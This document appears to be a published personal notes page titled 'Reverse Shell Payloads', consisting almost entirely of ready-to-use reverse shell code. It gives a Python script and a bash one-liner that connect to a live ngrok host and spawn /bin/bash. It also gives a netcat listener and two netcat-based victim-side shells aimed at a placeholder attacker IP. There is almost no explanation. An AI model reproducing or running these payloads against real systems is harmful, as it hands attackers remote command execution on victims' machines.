🧠 Reverse Shell Payloads

What is it?

Concept: You know, it’s already in the name of the note.
Impact: Remote code execution

Payloads

Python

Script:

import socket,os,pty
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('0.tcp.ap.ngrok.io',14771))
 
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
 
pty.spawn('/bin/bash')

Bash payloads:

python3 -c "import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('0.tcp.ap.ngrok.io',14771));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" &

Netcat

Attacker machine

netcat -nvlp [port]

Victim machine

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attacker_IP] [port] >/tmp/f

If the victim has the correct netcat version installed (one that has -e flag)

nc -e /bin/sh [attacker_IP] [port]

TABLE creation_date AS "Created" 
FROM "05 - Content" 
WHERE contains(techniques, this.file.link) AND contains(tags, "🚩") 
SORT file.name ASC

References: Link

Quartz 4

Explorer

Reverse Shell Payloads

🧠 Reverse Shell Payloads

What is it?

Payloads

Python

Netcat

Graph View

Table of Contents

Backlinks

Quartz 4

Explorer

Reverse Shell Payloads

🧠 Reverse Shell Payloads

What is it?

Payloads

Python

Netcat

Related Usage

Graph View

Table of Contents

Backlinks